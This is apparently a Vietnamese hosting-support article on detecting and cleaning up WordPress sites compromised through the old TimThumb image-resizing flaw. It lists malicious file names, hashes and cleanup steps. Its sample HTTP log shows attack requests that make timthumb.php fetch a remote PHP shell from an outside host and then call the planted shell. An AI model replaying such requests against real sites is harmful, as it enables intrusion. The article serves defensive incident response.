Tấn công vào WordPress: TimThumb

TimThumb là công cụ do các chủ đề và trình cắm WordPress dùng để đổi cỡ ảnh. Các phiên bản cũ của TimThumb có một lỗ hổng bảo mật cho phép tin tặc tải lên tập tin độc hại ("xấu") từ một website khác. Sau đó, tập tin xấu đầu tiên sẽ cho phép tin tặc tải nhiều tập tin độc hại khác lên tài khoản lưu trữ của bạn.

Bạn có thể tìm hiểu thêm thông tin về các tình huống tấn công và cách giải quyết trong Sẽ thế nào nếu website của tôi bị tấn công?.

Dấu hiệu cho biết bạn đã bị tấn công

Bên cạnh các dấu hiệu được đề cập trong Sẽ thế nào nếu website của tôi bị tấn công?, bạn có thể phát hiện trang của mình bị ảnh hưởng bởi tình huống tấn công này nếu tài khoản của bạn chứa tập tin có các mô hình sau trong thư mục trình cắm:

  • external_[giá trị băm md5].php — ví dụ: external_dc8e1cb5bf0392f054e59734fa15469b.php
  • [giá trị băm md5].php — ví dụ: 7eebe45bde5168488ac4010f0d65cea8.php

Bạn có thể xem ví dụ các giá trị băm md5 khả dụng trong mục MD5SUMS của tập tin độc hại đã biết trong bài viết này.

Bạn cũng có thể tìm thấy những tập tin sau trong thư mục gốc của website (thông tin thêm):

  • x.txt
  • logx.txt

Biện pháp khắc phục

Bạn phải loại bỏ toàn bộ tập tin xấu và tập tin bị tấn công. Trước khi xóa bất cứ thứ gì, bạn nên tạo bản sao lưu website (thông tin thêm).

Xác định tập tin xấu

Tập tin xấu ban đầu được tải lên thông qua lỗ hổng TimThumb thường sẽ nằm ở một trong những thư mục sau đây, đặt trong thư mục /theme hoặc /plugin chứa tập tin TimThumb dễ bị tấn công.

  • /tmp
  • /cache
  • /images

Ví dụ về vị trí của tập tin xấu:

[webroot]/wp-content/themes/[chủ đề chứa TimThumb dễ bị tấn công]/cache/images/

Ví dụ về tên tập tin xấu ở các vị trí này:

  • ef881b33fba49bd6ad1818062d071a9c.php
  • db648d44074f33a8857066b97290d247.php
  • 3cf739debc9340540c923bbf3b73044b.php
  • dc33a2e36d3179a06278191088c2ef35.php
  • 8377cb73d30655dc2cbf906c9310da56.php
  • eb117b212e2906f52c0a0c9132c6c07a.php
  • a4924ec23939d2410354efbb8d4ddd06.php
  • vvv3.php
  • ea90e1e4d7ba30848f70b13d616c6ed4.php
  • 236268f2a06e4153365b998d13934eb9.php
  • 6a4fa516943e2fa09e3704486075de9f.php
  • 896c4eb4ff2581f6e623db1904b80a44.php
  • wp-images.php

Tập tin x.txtlogx.txt sẽ chứa thông tin về thời điểm tập tin xấu được tạo bằng lỗ hổng TimThumb và vị trí của tập tin xấu trong tài khoản lưu trữ. Thông tin này sẽ giúp bạn xác định tập tin cần loại bỏ và nơi chứa những tập tin đó. Tuy nhiên, có thể thông tin này sẽ không cung cấp danh sách đầy đủ các tập tin cần được loại bỏ.

Ví dụ:

Ngày : Thứ năm, ngày 11 tháng 4 năm 2013 06:21:15 -0700
IP: X.X.X.X
Trình duyệt: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Url: /wp-content/themes/[chủ đề chứa TimThumb dễ bị tấn công]/cache/images/2817f389ac8b52527a0c5e4aabb464aa.php?clone

Tập tin cần loại bỏ

Sau khi tạo bản sao lưu trang, hãy xóa các tập tin sau:

  • x.txt
  • logx.txt
  • external_[giá trị băm md5].php — ví dụ: external_dc8e1cb5bf0392f054e59734fa15469b.php
  • [giá trị băm md5].php — ví dụ: 7eebe45bde5168488ac4010f0d65cea8.php
  • Các tập tin PHP độc hại khác tìm thấy cùng những tập tin có tên chứa giá trị băm md5.

Bạn có thể thực hiện thao tác này qua FTP (thông tin khác) hoặc thông qua trình quản lý tập tin bên trong bảng điều khiển tài khoản lưu trữ của mình (thông tin thêm).

Bạn cũng nên:

  • Cập nhật tất cả chủ đề và trình cắm lên phiên bản mới nhất.
  • Thay thế mọi phiên bản TimThumb.php bằng phiên bản mới nhất bạn tìm được ở đây.

Thông tin kỹ thuật

Mẫu nhật ký HTTP

x.x.x.x - - [27/04/2014:08:04:22 -0700] "GET SampleSite.tld/wp-content/themes/[chủ đề chứa TimThumb dễ bị tấn công]/framework/timthumb.php?src=http%3A%2F%2Fimg.youtube.com.bargainbookfinders.com%2Fsempak.php HTTP/1.1" 200 1018 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.s - - [27/04/2014:08:04:23 -0700] "GET SampleSite.tld/wp-content/themes/[chủ đề chứa TimThumb dễ bị tấn công]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php?clone HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/04/2014:08:04:26 -0700] "GET SampleSite.tld/wp-includes/wp-script.php HTTP/1.1" 404 36841 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/04/2014:08:04:28 -0700] "GET SampleSite.tld/wp-content/themes/[chủ đề chứa TimThumb dễ bị tấn công]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/04/2014:08:04:30 -0700] "GET SampleSite.tld/wp-content/themes/[chủ đề chứa TimThumb dễ bị tấn công]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"

MD5SUMS của tập tin độc hại đã biết

  • 2c4bcdc6bee98ed4dd55e0d35564d870
  • 10069c51da0c87ad904d602beb9e7770
  • 8855aecb5c45a5bfd962b4086c8ff96a
  • 526a4cf1f66f27a959a39019fdf1fae9
  • 161d2e53c664bd0fe1303017a145b413
  • 39f186a0f55b04c651cbff6756a64ccc
  • f67ca8f0bac08f5e8ccab6013b7acf70
  • 747c7afcda0eef0eff6ed6838494c32
  • cfdf59a58057b62f4707b909bcbd4577

Các tập tin độc hại khác

  • wp-script.php
  • wp-images.php
  • vvv3.php
  • data.php

Bài này có hữu ích không?
Cảm ơn về phản hồi của bạn. Để nói chuyện với một đại diện của dịch vụ khách hàng, vui lòng sử dụng số điện thoại hỗ trợ hoặc tùy chọn trò chuyện ở trên.
Rất vui vì chúng tôi đã giúp được bạn! Chúng tôi có thể làm gì thêm cho bạn?
Rất tiếc về điều đó. Vui lòng cho chúng tôi biết điều gì làm cho bạn bối rối và vì sao giải pháp không khắc phục được vấn đề này.